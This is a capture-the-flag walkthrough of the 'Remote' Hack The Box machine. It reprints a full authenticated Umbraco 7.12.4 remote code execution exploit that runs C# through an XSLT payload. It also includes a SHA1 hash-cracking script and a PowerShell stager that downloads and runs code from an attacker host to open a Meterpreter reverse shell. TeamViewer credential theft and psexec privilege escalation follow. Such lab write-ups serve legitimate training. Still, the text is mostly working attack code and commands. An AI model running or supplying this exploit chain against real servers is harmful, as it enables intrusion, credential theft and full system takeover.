Remote

Enumeration

Defining a helper variable containing the IP will make the following commands easier:

export ip=10.10.10.180

Ping and Nmap can be used to read the TTL, which hints at the operating system (Windows answers with a TTL of 128, so 127 after one hop), and to find the open ports on the server:

ping $ip
# TTL 127 - Windows
nmap -sC -sV -p- -Pn $ip
Port   Service        Version                  Notes
21     ftp            Microsoft ftpd           anonymous login allowed
80     http           Microsoft HTTPAPI        Acme Widgets site
111    rpcbind?       (not identified by nmap) NFS portmapper
135    msrpc          Microsoft Windows RPC
445    microsoft-ds                            SMB
2049   nfs            2-4 (RPC #100003)        NFS export
5985   http           Microsoft HTTPAPI        WinRM

HTTP

dirsearch -e php,html -f -u http://$ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

This finds an interesting application running at http://10.10.10.180/umbraco which has a login portal with reset password function.

FTP

Checking the ftp service as user anonymous shows there are no files of interest on the server.

ftp $ip
# anonymous / nopass
ls
# shows no files

NFS

Listing the NFS exports shows a single share, readable by everyone:

showmount -e $ip
# Export list for 10.10.10.180:
# /site_backups (everyone)

To explore this further we can mount this to our local system:

sudo mount -t nfs $ip:/site_backups /mnt

Searching the Logs folder reveals a user email that has previously logged in: admin@htb.local

Password Retrieval

In the App_Data folder there is the Umbraco database file, Umbraco.sdf. Searching it with less for the known login email shows the user records; each record ends with a JSON fragment naming the hash algorithm, e.g. {"hashAlgorithm":"SHA1"}, so grepping for hash pulls out every record that stores a password hash:

strings Umbraco.sdf | grep hash
Retrieved Password Hashes
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32

The admin record uses the legacy unsalted SHA1 format (the smith and ssmith records are salted HMACSHA256 and are not cracked here), so the hash can be attacked directly with John's Raw-SHA1 format:

echo "b8be16afba8c314ad33d812f22a04991b90e2aaa" > hash
john --format=Raw-SHA1 hash --wordlist=/usr/share/wordlists/rockyou.txt
# baconandcheese
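Because strings prints adjacent varchar columns with no separator, pulling the login, algorithm, salt and hash out of those glued-together lines by hand is error-prone. The script below is an added example for this write-up (not code from the page's author or from Umbraco): it parses the six records shown above (embedded inline so it runs offline), deduplicates them, and runs the same unsalted SHA1 dictionary attack that john performs, against a constructed mini wordlist standing in for rockyou.txt. The field names name, login and key are my labels for the columns as they appear in the dump, not Umbraco's column names; the page reports that the admin hash cracks to baconandcheese.

```python
"""Parse Umbraco.sdf user records (strings | grep hash output) and check the
unsalted SHA1 rows against a wordlist. Added example, not the page's own code."""
import hashlib
import re

# One record per line:
#   <display name><login><hash material>{"hashAlgorithm":"..."}<login again><culture><user GUID>
# The fields are recovered from the fixed-width hash material and the JSON fragment:
#   SHA1       -> 40 hex chars, no salt
#   HMACSHA256 -> base64 16-byte salt (24 chars, "==") + base64 32-byte hash (44 chars, "=")
RECORD = re.compile(
    r'^(?P<prefix>.*?)'
    r'(?:(?P<sha1>[0-9a-f]{40})'
    r'|(?P<salt>[A-Za-z0-9+/]{22}==)(?P<hmac>[A-Za-z0-9+/]{43}=))'
    r'\{"hashAlgorithm":"(?P<alg>[A-Za-z0-9]+)"\}'
    r'(?P<suffix>.*)$'
)
GUID = re.compile(r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}')

# The dump lines from the write-up, embedded so this runs offline.
SAMPLE_RECORDS = """\
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
"""

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["password", "admin123", "Password1", "baconandcheese"]


def split_name_login(prefix, suffix):
    """The login is repeated at the start of the suffix, so the longest tail of
    the prefix that the suffix starts with is the login; the rest is the name."""
    for k in range(len(prefix)):
        cand = prefix[k:]
        if "@" in cand and suffix.startswith(cand):
            return prefix[:k], cand
    return prefix, None  # legacy rows such as "Administratoradmin" do not repeat it


def parse_records(text):
    records = []
    for line in text.splitlines():
        m = RECORD.match(line.strip())
        if not m:
            continue
        name, login = split_name_login(m["prefix"], m["suffix"])
        guid = GUID.search(m["suffix"])
        records.append({
            "name": name,
            "login": login,
            "alg": m["alg"],
            "hash": m["sha1"] or m["hmac"],
            "salt": m["salt"],  # None for the unsalted SHA1 rows
            "key": guid.group(0) if guid else None,
        })
    return records


def distinct_hashes(records):
    """Dedupe: the dump repeats rows, and admin's SHA1 appears three times."""
    seen = {}
    for r in records:
        seen.setdefault((r["alg"], r["salt"], r["hash"]), r)
    return list(seen.values())


def sha1_hex(password):
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def crack_sha1(hex_digest, candidates):
    """Dictionary attack on an unsalted SHA1, i.e. what john --format=Raw-SHA1 does.
    The salted HMACSHA256 rows are skipped: they need Umbraco's keyed-hash
    construction and the write-up does not crack them."""
    target = hex_digest.lower()
    for pw in candidates:
        if sha1_hex(pw) == target:
            return pw
    return None


def crack_all(records, wordlist):
    """Return {hash: password} for every distinct SHA1 row the wordlist hits."""
    found = {}
    for r in distinct_hashes(records):
        if r["alg"] == "SHA1":
            pw = crack_sha1(r["hash"], wordlist)
            if pw is not None:
                found[r["hash"]] = pw
    return found


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for r in recs:
        print(f'{r["name"]:<20} {r["login"] or "-":<18} {r["alg"]:<10} {r["hash"]}')
    print("distinct hashes:", len(distinct_hashes(recs)))
    print("cracked:", crack_all(recs, WORDLIST))
```

Only the SHA1 rows are attacked; the HMACSHA256 rows carry a per-user salt, so the same wordlist would have to be run through Umbraco's keyed-hash construction for each salt, which is why the write-up only cracks the admin account.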

Exploitation

The portal can now be logged into with the recovered credentials, admin@htb.local / baconandcheese. The help page lists the Umbraco version as 7.12.4. Searching for this version turns up an authenticated RCE exploit: it logs in through /umbraco/backoffice/UmbracoApi/Authentication/PostLogin, then submits an XSLT stylesheet containing an embedded C# msxsl:script block to /umbraco/developer/Xslt/xsltVisualize.aspx, which the server compiles and runs, returning the command output in the page. Several public scripts implement this and print the output of a chosen command.

# Search for exploits
searchsploit umbraco
# Check exploit sample
searchsploit -x aspx/webapps/49488.py
# Get exploit sample
searchsploit -m aspx/webapps/49488.py
# Execute it
python 49488.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c ipconfig
# works!
Exploit 49488.py
# Exploit Title: Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)
# Date: 2020-03-28
# Exploit Author: Alexandre ZANNI (noraj)
# Based on: https://www.exploit-db.com/exploits/46153
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# Example: python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig

import requests
import re
import argparse

from bs4 import BeautifulSoup

parser = argparse.ArgumentParser(prog='exploit.py',
    description='Umbraco authenticated RCE',
    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=80))
parser.add_argument('-u', '--user', metavar='USER', type=str,
    required=True, dest='user', help='username / email')
parser.add_argument('-p', '--password', metavar='PASS', type=str,
    required=True, dest='password', help='password')
parser.add_argument('-i', '--host', metavar='URL', type=str, required=True,
    dest='url', help='root URL')
parser.add_argument('-c', '--command', metavar='CMD', type=str, required=True,
    dest='command', help='command')
parser.add_argument('-a', '--arguments', metavar='ARGS', type=str, required=False,
    dest='arguments', help='arguments', default='')
args = parser.parse_args()

# Payload
payload = """\
<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "%s"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true;  proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; }  </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>\
""" % (args.arguments, args.command)

login = args.user
password = args.password
host = args.url

# Process Login
url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
loginfo = { "username": login, "password": password}
s = requests.session()
r2 = s.post(url_login,json=loginfo)

# Go to vulnerable web page
url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
r3 = s.get(url_xslt)

soup = BeautifulSoup(r3.text, 'html.parser')
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}
data = { "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE,
    "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR,
    "ctl00$body$xsltSelection": payload,
    "ctl00$body$contentPicker$ContentIdValue": "",
    "ctl00$body$visualizeDo": "Visualize+XSLT" }

# Launch the attack
r4 = s.post(url_xslt, data=data, headers=headers)
# Filter output
soup = BeautifulSoup(r4.text, 'html.parser')
CMDOUTPUT = soup.find(id="result").getText()
print(CMDOUTPUT)

This run lists the processes on the host and the services each one hosts, passing the arguments to powershell through -a:

python 49488.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell -a "tasklist /svc"

Of note, TeamViewer 7 is running; this version stores its credentials in a recoverable form, and Metasploit has a post module for extracting them (used below).

Remote Shell

msfconsole
use exploit/multi/script/web_delivery 
info
set target 2 # powershell
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.14.8
run
# powershell.exe -nop -w hidden -c IEX ((new-object Net.WebClient).DownloadString('http://10.10.14.8:8080/PhF6C0TqpP3emLl/M8r6ApMYJKX'));IEX ((new-object Net.WebClient).DownloadString('http://10.10.14.8:8080/PhF6C0TqpP3emLl/ndQCOjnFIYVA/1'));IEX ((new-object Net.WebClient).DownloadString('http://10.10.14.8:8080/PhF6C0TqpP3emLl'));

In a second terminal, use the Umbraco exploit to run the generated PowerShell stager on the target:

python 49488.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell -a "-nop -w hidden -c IEX ((new-object Net.WebClient).DownloadString('http://10.10.14.8:8080/PhF6C0TqpP3emLl/M8r6ApMYJKX'));IEX ((new-object Net.WebClient).DownloadString('http://10.10.14.8:8080/PhF6C0TqpP3emLl/ndQCOjnFIYVA/1'));IEX ((new-object Net.WebClient).DownloadString('http://10.10.14.8:8080/PhF6C0TqpP3emLl'));"
# Connection established (in 1st shell)!

TeamViewer passwords

The running TeamViewer service (version 7) stores its credentials in a recoverable form. The Metasploit post module below decrypts and prints them from the Meterpreter session:

use post/windows/gather/credentials/teamviewer_passwords
sessions # note the session number
set session 3 # from the previous step
run
# !R3m0te!

Vertical Privilege Escalation via printspool

Meterpreter's getsystem escalates from the low-privileged user the shell was started as to SYSTEM:

getsystem
# ...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).

Vertical Privilege Escalation via Smb

With SMB exposed on port 445, the recovered TeamViewer password can be tried as the local Administrator password. The Metasploit psexec module tests this and spawns a shell if the credentials are accepted:

use exploit/windows/smb/psexec
set rhosts 10.10.10.180
set SMBUser administrator
set SMBPass !R3m0te!
set LHOST tun0
run
shell
whoami
# admin shell!

Flags

cat c:/users/Public/user.txt
cd c:/users/Administrator/Desktop
cat root.txt